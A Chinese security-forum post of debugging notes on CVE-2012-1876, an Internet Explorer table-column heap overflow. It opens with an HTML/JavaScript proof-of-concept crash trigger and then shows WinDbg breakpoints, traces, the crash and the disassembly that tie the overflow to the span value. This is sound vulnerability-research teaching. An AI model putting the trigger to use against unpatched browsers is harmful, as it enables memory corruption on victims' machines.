-
-
[原创]漏洞分析备忘 CVE-2012-1876
-
发表于:
2015-1-1 19:57
5218
-
<html>
<body>
<table style="table-layout:fixed" >
<col id="132" width="41" span="1" >  </col>
</table>
<script>
function over_trigger() {
var obj_col = document.getElementById("132");
obj_col.width = "42765";
obj_col.span = 1000;
}
setTimeout("over_trigger();",1);
</script>
</body>
</html>
主要是写一下调试思路,网上大部分都是讲漏洞原理,很少又讲怎么调处来的。
根据上面的样本,在没有任何细节的情况下先看了看有没有关于相关结构的说明,查不到。
没办法,加载进去浏览器崩溃,但是离着事发现场太远也无法回溯,用!heap -p -a address 也没有任何的有用信息。
最后没办法想了个恶心的招不见得好用试试吧先x mshtml!*getElementById*
0:005> x mshtml!*getElementById*
676a1afc mshtml!s_methdescCDocumentie8_getElementById = <no type information>
6764f678 mshtml!CDocument::getElementById = <no type information>
675464fa mshtml!CMarkup::GetElementByID = <no type information>
676a185c mshtml!s_methdescCDocumentgetElementById = <no type information>
6754645a mshtml!CDocument::ie8_getElementById = <no type information>
6764df3e mshtml!CDocument::InternalGetElementById = <no type information>
由于不熟悉到底是哪个函数处理的该问题,只好全部下断点
bu *******
不具体介绍
0:005> g
Breakpoint 35 hit
eax=04191038 ebx=67a08b78 ecx=6764f678 edx=0386eb74 esi=00001200 edi=00000000
eip=6764f678 esp=0386eb48 ebp=0386eb78 iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000206
mshtml!CDocument::getElementById:
断点停在了这,在跑几次其他函数并没有断下来就可以定位该函数是处理函数了!
接下来 又大概看了下也没有头绪,我是个懒人,
想看看流程
所以用tc 10000
具体tc是干嘛的 查询相关文档吧 不具体介绍了
这个好处是可以在程序崩溃的时候向上查看程序运行的流程 可是有点慢,好在是自动化
eax=00000009 ebx=00414114 ecx=04141149 edx=00004141 esi=002bed14 edi=002bed2c
eip=678ff169 esp=0356dcb8 ebp=0356dcc4 iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000206
mshtml!CTableColCalc::AdjustForCol+0x17:
678ff169 e89eacdbff call mshtml!CUnitValue::IsScalerUnit (676b9e0c)
eax=00414114 ebx=00414114 ecx=04141149 edx=00004141 esi=002bed14 edi=002bed2c
eip=678ff177 esp=0356dcb4 ebp=0356dcc4 iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202
mshtml!CTableColCalc::AdjustForCol+0x25:
678ff177 e805c4bdff call mshtml!CUnitValue::SetValue (674db581)
eax=003148b0 ebx=003475f0 ecx=00002530 edx=00004141 esi=002bed30 edi=00000001
eip=67775b89 esp=0356dccc ebp=0356dd74 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246
mshtml!CTableLayout::CalculateMinMax+0x52a:
67775b89 e8c4951800 call mshtml!CTableColCalc::AdjustForCol (678ff152)
eax=00000009 ebx=00414114 ecx=04141149 edx=00004141 esi=002bed30 edi=002bed48
eip=678ff169 esp=0356dcb8 ebp=0356dcc4 iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000206
mshtml!CTableColCalc::AdjustForCol+0x17:
678ff169 e89eacdbff call mshtml!CUnitValue::IsScalerUnit (676b9e0c)
eax=00414114 ebx=00414114 ecx=04141149 edx=00004141 esi=002bed30 edi=002bed48
eip=678ff177 esp=0356dcb4 ebp=0356dcc4 iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202
mshtml!CTableColCalc::AdjustForCol+0x25:
678ff177 e805c4bdff call mshtml!CUnitValue::SetValue (674db581)
eax=003148b0 ebx=003475f0 ecx=0000254c edx=00004141 esi=002bed4c edi=00000001
eip=67775b89 esp=0356dccc ebp=0356dd74 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246
mshtml!CTableLayout::CalculateMinMax+0x52a:
67775b89 e8c4951800 call mshtml!CTableColCalc::AdjustForCol (678ff152)
(820.d2c): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=002dcef8 ecx=00250000 edx=002dcef8 esi=7389dec2 edi=002dcee0
eip=774b1ffe esp=0520e1c0 ebp=0520e1f4 iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202
ntdll!RtlpLowFragHeapFree+0x31:
774b1ffe 8b4604 mov eax,dword ptr [esi+4] ds:0023:7389dec6=????????
IE崩溃到了这里,
向上回溯可以看到call mshtml!CTableColCalc::AdjustForCol
在有就是深入分析该问题了这个拼的就是基础知识课硬实力了,没有什么技巧可言
在该函数下下断点bu mshtml!CTableColCalc::AdjustForCol
重新运行程序
程序在此处断下来后查看查看栈空间
Breakpoint 42 hit
eax=003ccdd8 ebx=00417710 ecx=00000000 edx=00004141 esi=04183138 edi=00000001
eip=678ff152 esp=0386daa8 ebp=0386db54 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246
mshtml!CTableColCalc::AdjustForCol:
678ff152 8bff mov edi,edi
0:005> k
ChildEBP RetAddr
0386daa4 67775b8e mshtml!CTableColCalc::AdjustForCol
0386db54 675e0713 mshtml!CTableLayout::CalculateMinMax+0x52f
0386dd70 675caf19 mshtml!CTableLayout::CalculateLayout+0x276
0386df1c 676bcc48 mshtml!CTableLayout::CalcSizeVirtual+0x720
0386e054 676af5d0 mshtml!CLayout::CalcSize+0x2b8
0386e118 676af31d mshtml!CFlowLayout::MeasureSite+0x312
0386e160 676af664 mshtml!CFlowLayout::GetSiteWidth+0x156
0386e1a0 676afb40 mshtml!CLSMeasurer::GetSiteWidth+0xce
0386e224 6e69665d mshtml!CEmbeddedILSObj::Fmt+0x150
0386e2b4 6e696399 msls31!ProcessOneRun+0x3e9
0386e310 6e696252 msls31!FetchAppendEscCore+0x18e
0386e364 6e6961c3 msls31!LsDestroyLine+0x47f
0386e3ec 6e69293f msls31!LsDestroyLine+0x9ff
0386e428 676add81 msls31!LsCreateLine+0xcb
0386e578 676c17cc mshtml!CLSMeasurer::LSDoCreateLine+0x127
0386e61c 676c1ef5 mshtml!CLSMeasurer::LSMeasure+0x34
0386e664 676c1db1 mshtml!CLSMeasurer::Measure+0x1e6
0386e688 676c11a2 mshtml!CLSMeasurer::MeasureLine+0x1c
0386e738 676ea8f6 mshtml!CRecalcLinePtr::MeasureLine+0x46d
0386ef40 676eb304 mshtml!CDisplay::RecalcLines+0x8bb
继续反汇编这个函数mshtml!CTableLayout::CalculateMinMax
发现是个大循环
loc_74EC5B7A:
push [ebp+var_3C]
mov eax, [ebp+var_34]
push [ebp+arg_4]
mov esi, [ebp+var_24]
push [ebp+var_C]
call ?AdjustForCol@CTableColCalc@@QAEXPBVCWidthUnitValue@@HPAVCCalcInfo@@H@Z ; CTableColCalc::AdjustForCol(CWidthUnitValue const *,int,CCalcInfo *,int)
inc [ebp+var_14]
mov eax, [ebp+var_14]
add [ebp+var_20], 1Ch
cmp eax, [ebp+nDenominator]
jl short loc_74EC5B4C
在调试器里查看相应的值发现个有趣的值
0:005>
eax=00000003 ebx=00417710 ecx=04183188 edx=00004141 esi=04183170 edi=00000001
eip=67775b98 esp=0386dab8 ebp=0386db54 iopl=0 nv up ei pl nz ac po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000212
mshtml!CTableLayout::CalculateMinMax+0x539:
67775b98 3b4510 cmp eax,dword ptr [ebp+10h] ss:0023:0386db64=000003e8
对应上文的poc obj_col.span = 1000;
1000的十六进制是3e8
那接下来就下手去干吧!拼的是耐性了基础了!
[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课
